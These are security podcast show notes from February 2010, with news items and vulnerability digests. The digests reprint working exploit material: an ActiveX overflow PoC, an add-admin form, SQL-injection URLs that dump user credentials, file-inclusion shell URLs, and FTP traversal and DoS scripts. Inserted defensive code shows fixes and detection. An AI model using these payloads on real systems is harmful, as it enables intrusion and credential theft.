  4. Rising Online Virus Scanner ActiveX control is subject to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Successful exploits may allow an attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.  Rising Online Virus Scanner 22.0.5 is vulnerable; other versions may also be affected. Proof of concept code is available:
    <html>
    <body>
    <object classid='clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E'
    id='obj'></object>
    <script language='vbscript'>
    ' a 520,000-byte string passed to the control's Scan method overruns its buffer
    buf=String(520000, "A")
    obj.Scan buf
    </script>
    </body>
    </html>
  5. The KDE screensaver application is subject to a vulnerability that allows an attacker who has physical console access to bypass the user’s locked screen. This issue affects the KRunner application used to perform password validation. Computers may be affected by this issue even when no screensaver is being used. KDE 4.4.0 is vulnerable; other versions may also be affected. To exploit this issue, attackers require physical console access.
  6. Cisco ASA 5500 series appliances are subject to a remote authentication-bypass vulnerability. Successful exploits allow remote attackers to gain access to vulnerable devices, without requiring successful authentication. This issue is being tracked by Cisco bug ID CSCte21953. Attackers can use readily available tools to exploit this issue.
  7. The Sun-Java package of Pardus is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with escalated privileges and may completely compromise the affected computer. An attacker can use readily available command-line utilities to exploit this issue.

News Items of Interest:

News item 1:  http://news.cnet.com/8301-13860_3-10454741-56.html?part=rss&subj=news&tag=2547-1_3-0-20

Microsoft is looking into reports that some Windows Live customers may have gotten access to other users’ information.

“Microsoft is investigating reports of a limited number of instances in which Windows Live customers may have access to other customers’ accounts when accessing their account through mobile Web browser,” the company said in a statement Tuesday. “Microsoft takes customers’ privacy seriously, and immediately upon learning of these reports, we started an investigation.”

The company added that it “will take appropriate action once we have completed the investigation.”

News item 2: http://zero.facebook.com/

Facebook has revealed details of a stripped-down, text-only version of its mobile site called Facebook Zero. The low-bandwidth site is aimed at people viewing Facebook on their mobile and will launch “in the coming weeks”.  The social network recently said that more than 100 million people now access Facebook from their phone.  Is Kevin Johnson behind this?

News item 3: http://www.myinfosecjob.com/2010/01/7-things-every-security-professional-should-know/
The following is an extract from an article I came across. It attempts to address some aspects that go beyond skill sets; in fact, I might dare call them soft skills.

To be considered a respected Information Security Professional nowadays requires more than just knowing the bits or bytes, or the controls required by a given framework by heart. Being successful in your Information Security career requires you to have a deep understanding of the business needs (and how to enable, not disrupt them), sharp communication skills and a swift ability to sell yourself.

1. Learn to communicate effectively (This cannot be overstated. We struggle with it in our personal lives, in business and yes, even on this podcast)
2. Learn to say ‘maybe’ rather than ‘no’ (This is something I personally work at; I’d rather be perceived as an enabler than as a roadblock)
3. Social networking sites are not just extensions of instant messengers (I’m trying to embrace them, but people like Kevin Johnson scare the hell out of me!)
4. Monitor security industry budgets and salary trends (It’s nice to know what your skills are worth and what your industry is devoting to both IT and security budgets)
5. Don’t be limited to just reading (So those listening to this are already meeting this one!)
6. Blogging is serious business (As is podcasting; that’s not to say you can’t have fun, but you need to recognize its value)
7. Don’t be afraid of starting a business (or join a smaller company where you can make a difference)

News item 4:  http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=222900539
The Department of Defense has signaled its intention to develop new policies requiring its vendors to meet increased standards for cybersecurity for unclassified military information residing on or being carried over private sector systems and networks.

In a memo issued in late January, Department of Defense chief information officer Cheryl Roby laid out a number of leadership responsibilities and strategic guidance on the development of stronger cybersecurity plans.

“It is DoD policy to establish a comprehensive approach for protecting unclassified DoD information transiting or residing on unclassified [Defense industrial base] systems and networks and create a timely, coordinated, and effective partnership with the [Defense industrial base],” Roby wrote.

News item 5: http://www.krebsonsecurity.com/2010/02/hackers-steal-150000-from-mich-insurance-firm/

An insurance firm in Michigan lost nearly $150,000 this month as a result of a single computer virus infection.

Port Austin, Mich. based United Shortline Insurance Service Inc., an insurance provider serving the railroad industry, discovered on Feb. 5 that the computer used by their firm’s controller was behaving oddly and would not respond. The company’s computer technician scoured the system with multiple security tools, and found it had been invaded by “ZeuS,” a highly sophisticated banking Trojan that steals passwords and allows criminals to control infected hosts remotely.

The following Monday, Feb. 8, United Shortline received a call from the Tinker Federal Credit Union at Tinker Air Force Base in Oklahoma, inquiring about a suspicious funds transfer one of its customers had received for slightly less than $10,000.

After that call, United Shortline President Louis M. Schillinger said the firm found 14 other such unauthorized transfers had been made from the company’s account to individuals across the United States who had no prior business with Shortline.

News item 6: http://www.computerworld.com/s/article/9157098/Hackers_at_Pwn2Own_to_compete_for_100K_in_prizes?taxonomyId=17

The Pwn2Own contest next month will award cash prizes of $15,000 to anyone who can break into an iPhone, BlackBerry Bold, Droid or Nokia smartphone.

The prizes are 50% more than the top awards given last year at Pwn2Own, which will kick off March 24 at the CanSecWest security conference in Vancouver, British Columbia. Altogether, $100,000 could be handed out by 3Com TippingPoint, the contest sponsor.

Pwn2Own will again offer a dual-track challenge with both browser and mobile OS targets, said Aaron Portnoy, a TippingPoint security research team lead, on a company blog that announced details of this year’s contest.

Now in its fourth year, Pwn2Own has repeatedly made headlines for hacks of Apple’s Mac OS X and Microsoft’s Internet Explorer. In 2009, for example, researcher Charlie Miller broke into a Mac in less than five seconds to win $5,000.

Technical Segment: Stego fun.

Steganography articles
http://www.jjtc.com/pub/r2026.pdf
http://www.citi.umich.edu/u/provos/papers/practical.pdf
http://nas.takming.edu.tw/chkao/LNCS2001.pdf

James Shewmakers Defcon 16 talk
http://bit.ly/aaeyYS
Original Image

The encoded.png just has “Hello Rick!!!” embedded in it using LSB on each of the RGB values per pixel.  I want to see if I can write a simple bot that uses Steganography and blinddrops as a C&C.  Oh, and this is a much better tool:
http://steghide.sourceforge.net/
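The LSB scheme described above (one payload bit in the low bit of each R, G and B value), as an added example that is not code from the podcast, from encoded.png or from steghide. The cover "image" is a constructed list of RGB tuples rather than a real PNG so it runs offline, and the function names and the 16-bit length prefix are this example's own choices:

```python
# Added example, not code from the podcast: the least-significant-bit scheme
# the notes describe, one payload bit in the low bit of each R, G and B value.
# The cover "image" is a constructed list of RGB tuples so it runs offline.
from typing import List, Tuple

Pixel = Tuple[int, int, int]

# Constructed cover: 64 pixels with deterministic, non-trivial channel values.
COVER: List[Pixel] = [((10 * i) % 256, (7 * i + 3) % 256, (13 * i + 5) % 256)
                      for i in range(64)]


def _bits(data: bytes) -> List[int]:
    """Bit stream of data, most significant bit of each byte first."""
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def embed_lsb(pixels: List[Pixel], message: bytes) -> List[Pixel]:
    """Hide message in the LSB of every channel, prefixed by a 16-bit length.

    Capacity is three bits per pixel; raises ValueError when the cover is
    too small. Every channel value changes by at most one, which is why the
    result looks identical to the cover.
    """
    payload = len(message).to_bytes(2, "big") + message
    bits = _bits(payload)
    if len(bits) > 3 * len(pixels):
        raise ValueError("cover too small: need %d bits, have %d"
                         % (len(bits), 3 * len(pixels)))
    bits += [0] * (-len(bits) % 3)          # pad so the last pixel is complete
    out = list(pixels)
    for i in range(0, len(bits), 3):
        r, g, b = out[i // 3]
        out[i // 3] = ((r & ~1) | bits[i],
                       (g & ~1) | bits[i + 1],
                       (b & ~1) | bits[i + 2])
    return out


def extract_lsb(pixels: List[Pixel]) -> bytes:
    """Read the LSB plane back and return the embedded message."""
    bits = [channel & 1 for pixel in pixels for channel in pixel]

    def byte_at(n: int) -> int:
        chunk = bits[8 * n:8 * n + 8]
        if len(chunk) < 8:
            raise ValueError("bit stream ended early")
        return int("".join(str(b) for b in chunk), 2)

    length = (byte_at(0) << 8) | byte_at(1)
    return bytes(byte_at(2 + k) for k in range(length))


def max_channel_delta(a: List[Pixel], b: List[Pixel]) -> int:
    """Largest per-channel difference between two images of equal size."""
    return max(abs(x - y) for pa, pb in zip(a, b) for x, y in zip(pa, pb))


def demo() -> bytes:
    """Round-trip the message from the show notes through the constructed cover."""
    stego = embed_lsb(COVER, b"Hello Rick!!!")
    return extract_lsb(stego)


if __name__ == "__main__":
    print(demo())
```

The per-channel delta never exceeds one, which is what makes the change invisible to the eye; it is also why plain LSB embedding is weak against statistical tests on the low bit plane, the reason tools such as steghide do more than this.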

ZipIt stuff:

Buy it
http://www.amazon.com/ZIPIT-All-Wi-Fi-Messenger-Black/dp/B00115PR2O/ref=sr_1_1?ie=UTF8&s=electronics&qid=1266522988&sr=8-1

Hak5
http://hak5.org

Hunter Davis’ Blog
http://hunterdavis.com/archives/category/zipit-hacking

More Noob friendly userland image:
http://zipit.rootnexus.org/

2010
02.17

Episode 69 – “Very Nice”

InfoSec Daily Podcast

ISD Podcast Episode 69 for February 17, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010, March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC: go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
Shmoocon Fireside Talks: http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2010

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)

April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)

May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Huawei HG510 is subject to multiple cross-site request-forgery vulnerabilities. Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. Example URL is available: http://www.sample.com/password.cgi?sysPassword=BASE64_NEW_PASSWORD
  2. Généré par KDPics v1.18 is subject to a vulnerability that could allow an attacker to remotely add an Admin account.  Google Dork: “Généré par KDPics v1.18″. Exploit code is available:
    <html>
    <title>Généré par KDPics v1.18 Remote Add Admin</title>

    <body link="#00FF00" text="#008000" bgcolor="#000000">

    <form method="POST"
    action="http://www.site.com/kdpics/admin/index.php3?page=options&categorie=">
    <input value="add">
    <table border="1" cellpadding="4"
    style="border-collapse: collapse" width="100%"
    bordercolor="#808080">
    <tr>
    <td>
    <p align="center"><b>User & Pass :Snakespc</b></p>
    <p align="center"><b><font face="Comic Sans MS">
    <a href="http://server/path//index.php?act=idx"
    style="text-decoration: none">
    <font color="#00FF00">[&#187;]Founder:[ Snakespc
    Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
    [&#187;] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My
    Mamber >> sec-war.com/cc ]</p>[&#187;] Dork:"Généré par KDPics
    v1.18"</font></a></font></b></p>
    <p align="center"><b>Username:</b></td>
    </tr>
    <tr>
    <td height="1">
    <p align="center"><input size="30" value="Snakespc"></td>
    </tr>
    <tr>
    <td>
    <p align="center"><b>Password:</b></td>
    </tr>
    <tr>
    <td height="22">
    <p align="center">
    <input size="30" value="Snakespc"></td>
    </tr>
    <tr>
    <td align="right">
    <p align="center">
    <input value="Add User >>" style="font-weight: 700"></td>
    </tr>
    </table>
    </form>
    </body>
    </html>
    [&#187;]Author: Snakespc <-

  3. SyntaxCMS version 1.3 is subject to a remote file inclusion vulnerability.  PoC code is available: [SyntaxCMS_path]/admin/testing/tests/0004_init_urls.php?init_path=[Shell]
  4. PEAR version 1.9.0 is subject to multiple Remote File Inclusion vulnerabilities.  Exploit code is available: http://www.sample.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?include_path=[Shell.txt?]
  5. The ‘com_acteammember’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en
  6. The ‘com_acstartseite’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Example URL: http://www.sample.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&lang=de
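The Huawei HG510 item above is a cross-site request forgery: a password change reachable by a plain GET with no proof that the request came from the device's own pages. The check below is an added example, not code from the podcast or from Huawei, of what a device web interface needs before honouring a state-changing request; the request dicts, the 192.0.2.1 address, the csrf_token field name and the function names are this example's assumptions:

```python
# Added example, not code from the podcast or from Huawei: a minimal check a
# device web interface can apply to state-changing requests, with a request
# constructed in the shape of the password.cgi URL from item 1.
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_HOST = "192.0.2.1"   # documentation address standing in for the router


def new_session_token() -> str:
    """Per-session CSRF token; stored server-side and rendered into forms."""
    return secrets.token_urlsafe(32)


def is_safe_state_change(request: Dict, session_token: Optional[str]) -> Tuple[bool, str]:
    """Return (accepted, reason) for a request that changes device state.

    request is a constructed dict with 'method', 'url', 'headers' and 'form'.
    Three independent conditions, any one of which blocks a forged request:
      1. state changes only over POST (a GET from an <img> or a link is rejected);
      2. the form must carry the token tied to this session, compared in
         constant time;
      3. if the browser sent Origin or Referer, its host must be this device.
    """
    if request.get("method", "GET").upper() != "POST":
        return False, "state change must use POST"
    if session_token is None:
        return False, "no authenticated session"
    form_token = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(form_token.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    source = headers.get("origin") or headers.get("referer")
    if source is not None and urlsplit(source).hostname != ALLOWED_HOST:
        return False, "cross-origin request from %s" % urlsplit(source).hostname
    return True, "ok"


def example_requests(token: str) -> Tuple[Dict, Dict]:
    """Constructed requests: a forged GET in the advisory's shape, then a
    legitimate POST from the device's own form carrying the session token."""
    forged = {
        "method": "GET",
        "url": "http://%s/password.cgi?sysPassword=BASE64_NEW_PASSWORD" % ALLOWED_HOST,
        "headers": {"Referer": "http://lure.example/page.html"},
        "form": {},
    }
    legit = {
        "method": "POST",
        "url": "http://%s/password.cgi" % ALLOWED_HOST,
        "headers": {"Origin": "http://%s" % ALLOWED_HOST},
        "form": {"sysPassword": "BASE64_NEW_PASSWORD", "csrf_token": token},
    }
    return forged, legit


if __name__ == "__main__":
    tok = new_session_token()
    for req in example_requests(tok):
        print(req["method"], is_safe_state_change(req, tok))
```

The Origin/Referer check is deliberately the last line of defence, not the first: browsers do not always send those headers, so a missing header is allowed through while a wrong one is refused, and the token check carries the real weight.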
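Items 5 and 6 are the classic UNION-based injection through a numeric parameter: the component pastes id or Itemid into the SQL text, so a value starting with -1 UNION SELECT ... becomes a second query against the users table. The following is an added example, not code from the podcast or from Joomla, that reproduces the flaw against a constructed in-memory SQLite schema (a made-up members table beside a mos_users table as named in the URLs), shows the bound-parameter form that neutralises it, and adds a log-line heuristic for spotting the request shape; all table contents, the log line and the function names are constructed for this example:

```python
# Added example, not code from the podcast or from Joomla: the concatenated
# query behind a UNION-based SQL injection, the parameterized fix, and a
# log heuristic. Schema, rows and the log line are constructed.
import re
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote_plus


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE members(id INTEGER, name TEXT, role TEXT);
        INSERT INTO members VALUES (1, 'Alice', 'editor'), (2, 'Bob', 'member');
        CREATE TABLE mos_users(username TEXT, password TEXT);
        INSERT INTO mos_users VALUES ('admin', 'HASH_PLACEHOLDER');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, member_id: str) -> List[Tuple]:
    """The flaw: the parameter becomes part of the statement and is parsed as SQL.
    The trailing condition is what the '--' in the payload comments out."""
    sql = ("SELECT name, role FROM members WHERE id = " + member_id
           + " AND role != 'banned'")
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, member_id: str) -> List[Tuple]:
    """Hardened form: validate the type, then bind the value with a placeholder."""
    try:
        value = int(member_id)
    except ValueError:
        raise ValueError("id must be an integer, got %r" % member_id)
    return con.execute(
        "SELECT name, role FROM members WHERE id = ? AND role != 'banned'",
        (value,)).fetchall()


# SQLite has no concat(); '||' plays the role of concat(username,0x20,password).
UNION_PAYLOAD = "-1 UNION SELECT username || ' ' || password, 'x' FROM mos_users--"

# Constructed access-log line in the shape of the advisory URL.
LOG_LINE = ('203.0.113.5 - - [17/Feb/2010:10:00:00 +0000] "GET /index.php?option=com_acteammember'
            '&id=-1+UNION+SELECT+1,2,concat(username,0x20,password)+from+mos_users--'
            '&Itemid=121 HTTP/1.1" 200 512')

_UNION_RE = re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.IGNORECASE)


def looks_like_union_injection(log_line: str) -> bool:
    """Heuristic for log review: decode the request path and look for UNION ... SELECT."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', log_line)
    if not m:
        return False
    return bool(_UNION_RE.search(unquote_plus(m.group(1))))


def demo() -> dict:
    con = make_db()
    leaked = lookup_vulnerable(con, UNION_PAYLOAD)        # rows from mos_users
    try:
        lookup_parameterized(con, UNION_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "blocked": blocked,
            "normal": lookup_parameterized(con, "1"),
            "flagged": looks_like_union_injection(LOG_LINE)}


if __name__ == "__main__":
    print(demo())
```

The bound form works because the driver never lets the value reach the SQL parser; the int() check on top of it is cheap and turns junk into a clean error instead of a silent empty result. The regex is only a triage aid: it catches the pattern seen in these advisories, not every encoding an attacker could use.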

News Items of Interest:

News item 1: http://www.gizmodo.com.au/2010/02/is-apple-banning-iphone-hackers/

Sherif Hashim and iH8sn0w are both reporting bannings by Apple ID, following their latest hacks.  Is Apple attacking jailbreak from the bottom up? Maybe. Both Sherif Hashim and iH8sn0w were behind the discovery of recent iPhone exploits, and both are currently receiving a “This Apple ID has been banned for security purposes” notification whenever they try to log into the (actual) App Store to download an app. But. But! While Sherif’s exploit was publicly documented, IH8sn0w’s was shared only with the Dev Team. So: Is Apple somehow detecting certain exploits and banning automatically?

News item 2: http://reviews.cnet.com/8301-13970_7-10453550-78.html?part=rss&subj=news&tag=2547-1_3-0-20

Dick Lynch, an executive vice president and CTO for Verizon Communications, said during a press conference here that Verizon Wireless is on track to launch its commercial LTE (long-term evolution) service this year. The gathering was hosted by the GSM Association, which puts on the Mobile World Congress.

Lynch said Verizon Wireless is in the final testing phase, or “Phase 4,” of its LTE technology. Within 60 days he said he expects testing to be completed in Boston and Seattle. After those trials are complete, Verizon will be ready to announce commercial deployments.

News item 3: http://www.computerworld.com/s/article/9157558/Update_Adobe_issues_emergency_PDF_patches?taxonomyId=18
As expected, Adobe today released an emergency update that patched a pair of critical vulnerabilities in its popular PDF viewing and editing software.

Adobe ranked both bugs as critical.

Last Thursday Adobe said it would issue a rush patch for Adobe Reader and Adobe Acrobat on Feb. 16; it made good on the promise yesterday by addressing two flaws. One was identical to the cross-domain request vulnerability fixed last week in Flash Player, Adobe’s ubiquitous media player, while the second was a vulnerability that attackers could exploit to install malware on a targeted machine.

The bug related to Flash Player, tagged as CVE-2010-0186 in the Common Vulnerabilities and Exposures (CVE) database, cannot be used to inject malicious code into a system, but could be exploited by information thieves in a cross-site scripting style of attack.

News item 4: http://chatroulette.com/

Make sure there are no kids in the room if you plan on trying out the Chatroulette video chat service. While I was able to have a couple of very nice conversations with fully clothed polite individuals, I saw some things I would rather have avoided as I tested this relatively new service.

When you first enter the site you’ll see two large black boxes and a blank area for text chat. As soon as you click “play,” you’ll see a stranger’s picture in the top box and–at least on my machine–a notice asking if you wish to allow the site to access your video camera. If you click “allow,” you’ll see your picture in the bottom box.

News item 5: http://cwe.mitre.org/top25/

Computer experts from some 30 organizations worldwide have once again compiled a list of the 25 most dangerous programming errors along with a novel way to prevent them: by drafting contracts that hold developers responsible when bugs creep into applications.

The list for 2010 bears a striking resemblance to last year’s list, which was the first time a broad cross section of the world’s computer scientists reached formal agreement on the most common programming pitfalls. The effort is designed to shift attention to the underlying mistakes that allow vulnerabilities to happen in the first place.

Rank  Score  ID       Name
[1]   346    CWE-79   Failure to Preserve Web Page Structure (‘Cross-site Scripting’)
[2]   330    CWE-89   Improper Sanitization of Special Elements used in an SQL Command (‘SQL Injection’)
[3]   273    CWE-120  Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)
[4]   261    CWE-352  Cross-Site Request Forgery (CSRF)
[5]   219    CWE-285  Improper Access Control (Authorization)
[6]   202    CWE-807  Reliance on Untrusted Inputs in a Security Decision
[7]   197    CWE-22   Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
[8]   194    CWE-434  Unrestricted Upload of File with Dangerous Type
[9]   188    CWE-78   Improper Sanitization of Special Elements used in an OS Command (‘OS Command Injection’)
[10]  188    CWE-311  Missing Encryption of Sensitive Data
[11]  176    CWE-798  Use of Hard-coded Credentials
[12]  158    CWE-805  Buffer Access with Incorrect Length Value
[13]  157    CWE-98   Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP File Inclusion’)
[14]  156    CWE-129  Improper Validation of Array Index
[15]  155    CWE-754  Improper Check for Unusual or Exceptional Conditions
[16]  154    CWE-209  Information Exposure Through an Error Message
[17]  154    CWE-190  Integer Overflow or Wraparound
[18]  153    CWE-131  Incorrect Calculation of Buffer Size
[19]  147    CWE-306  Missing Authentication for Critical Function
[20]  146    CWE-494  Download of Code Without Integrity Check
[21]  145    CWE-732  Incorrect Permission Assignment for Critical Resource
[22]  145    CWE-770  Allocation of Resources Without Limits or Throttling
[23]  142    CWE-601  URL Redirection to Untrusted Site (‘Open Redirect’)
[24]  141    CWE-327  Use of a Broken or Risky Cryptographic Algorithm
[25]  138    CWE-362  Race Condition

News item 6: http://www.washingtonpost.com/wp-dyn/content/article/2010/02/14/AR2010021403817.html?hpid=sec-tech

More private computers were commandeered by hackers for malicious purposes in China in the last quarter of 2009 than in any other country, according to a new study by an Internet security company.

These “zombie” computers are often grouped into “botnets,” or armies of infected computers that can be used to send spam e-mail or attack websites, according to McAfee. The company, which said it collects information about Internet-based threats that target more than 100 million computers in 120 countries, said that in the last three months of 2009, about 1,095,000 computers in China were infected and 1,057,000 in the United States.

News item 7: http://ha.ckers.org/blog/20100216/google-buzz-security-flaw/

Apparently, the Google Buzz for Mobile Web site is subject to a cross-site scripting flaw which could allow an attacker to have your Buzz say things you don’t want to say or follow people you don’t want to follow.  This is yet another example of bad input validation/output encoding by your favorite advertising overlords at Google.

There are four things of note here. Firstly, it’s on Google’s domain, not some other domain like Google Gadgets or something. So yes, it’s bad for phishing and for cookies. Secondly, it’s over SSL/TLS, and thirdly, it could be used to hijack Google Buzz.

So I set out to remove myself from Buzz, and it’s not quite as difficult as it once was. One way to do this is to find your profile (http://www.google.com/profiles) and search on your name. Next, permanently delete buzzes in the public timeline by clicking the “Delete” tag. Then get to work unfollowing those that Google has “helped” you automatically follow.  Once you’ve done that you can go into your profile and choose delete.  This will remove your public profile, which is probably redundant as it also removes your buzzes and followers, etc.  Now you can go to the bottom of Gmail and click “Turn Off Buzz”.  That should do it.

2010
02.16

InfoSec Daily Podcast

ISD Podcast Episode 68 for February 16, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010, March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC: go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
Shmoocon Fireside Talks: http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2010

Vulnerabilities of Interest:

  1. The Linux kernel is subject to a local denial-of-service vulnerability. Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users. Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.  NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. Exploit code is available.
  2. StatCounteX is subject to a vulnerability that results in unauthorized administrative access. The application fails to authenticate users when certain pages are accessed. Attackers can leverage this issue to compromise the application, which could aid in other attacks. StatCounteX 3.0 and 3.1 are vulnerable; other versions may also be affected. Attackers can use a browser to exploit this issue.
  3. The ‘com_flashmagazinedeluxe’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_flashmagazinedeluxe&Itemid=36&task=magazine&mag_id=4+AND SUBSTRING(@@version,1,1)=4
  4. The ‘com_hdvideoshare’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(username,0x3a,password,0x3a,email),2,3,4+from+jos_users
  5. The ‘com_videos’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL:  http://www.sample.com/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users
  6. httpdx is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this issue allows an authenticated user to create directories outside the FTP root directory, which may lead to other attacks. httpdx 1.5 is vulnerable; other versions may also be affected. Exploit Code is available:
    # Exploit Title: httpdx - ultralight http/ftp server directory Traversal
    # Date: 14/2/2010
    # Author: FB1H2S
    # Software Link: http://sourceforge.net/projects/httpdx/
    # Version: v1.5
    # Tested on: WIN XP2
    # CVE : [if exists]
    # Code : Attached

    #!/usr/bin/python
    # Greetz to all Darkc0de, Andhra Hackers and ICW Memebers
    # Thanks : Mr bond,Wipu,GOdwinAustin,The_empty,beenu,hg_H@x0r,r45c4l,it_security,eberly
    # Shoutz : SMART_HAX0R,j4ckh4x0r,41w@r10r,Hackuin
    import socket
    import sys

    hostname = 'localhost'
    username = 'admin'
    passwd = 'password'

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except socket.error:
        print("Connection error!")
        sys.exit(1)

    r = sock.recv(1024)                    # server banner
    sock.send("user %s\r\n" % username)
    r = sock.recv(1024)
    sock.send("pass %s\r\n" % passwd)
    r = sock.recv(1024)
    # The FTP root is example.com; the '../' in the MKD argument steps out of the root directory
    sock.send("MKD ../fb1h2s\r\n")
    sock.close()
    sys.exit(0)

  7. The Copperleaf Photolog plugin for WordPress is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
  8. The AllVideos component for Joomla! is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Example URL: http://www.sample.com/plugins/content/jw_allvideos/includes/download.php?file=./../…/file.php
  9. CodeIgniter v1.0 is subject to a Remote File Inclusion Vulnerability.  Exploit URLs: /system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
    /system/database/DB_driver.php?BASEPATH=[Shell.txt?]
  10. Apple iPhone and iPod are subject to a DBlite Remote DOS exploit.  Proof of concept code is available:
    #!/usr/bin/python
    #
    # Apple Iphone/Ipod - My DBLite Edition Remote 0day DOS exploit
    # Found by: Jason Bowes - admin @ blue-dogz.com
    # App Homepage: www.xenugo.co
    # Price: Free
    # Download: From the app store (use your itunes account)
    # Tested on: Iphone 3GS - firmware 3.1.2
    # What's up to slicc1
    # Advisory: ()

    import sys
    import socket

    print("[+] Apple Iphone/Ipod - My DB lite edition Remote DOS exploit")


    def Usage():
        print("Usage:  ./mydblite.py <serv_ip>\n")
        print("Example:./mydblite.py 192.168.1.3\n")


    if len(sys.argv) != 2:
        Usage()
        sys.exit(1)
    else:
        hostname = sys.argv[1]

    delete = "$A$A$A" * 10000000          # oversized DELE argument

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 29161))
        print("[+] Connecting to the target..")
    except socket.error:
        print("[-] Connection error!")
        sys.exit(1)

    r = sock.recv(1024)                   # server banner
    print("[+] Sending payload..boom..boom..pow")
    sock.send("DELE %s\r\n" % delete)
    print("[+] Server should now be DoS'd!")
    sys.exit(0)
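Items 6 and 8 above are both path traversal: a client-supplied path (the MKD argument to httpdx, the file parameter of AllVideos' download.php) is joined to a served root without checking that the result still lies inside it. The containment logic below is an added example, not code from the podcast, from httpdx or from Joomla, of how a server should resolve such a path; the function names, the /srv/ftp root and the FTP reply text are this example's assumptions (257 and 550 are the standard MKD success and refusal codes):

```python
# Added example, not code from the podcast or from httpdx/Joomla: server-side
# containment for a client-supplied path such as an FTP MKD argument or a
# download script's 'file' parameter. Root, names and replies are assumptions.
import os
from typing import List, Tuple


class TraversalError(ValueError):
    """Raised when a client path would leave the served root."""


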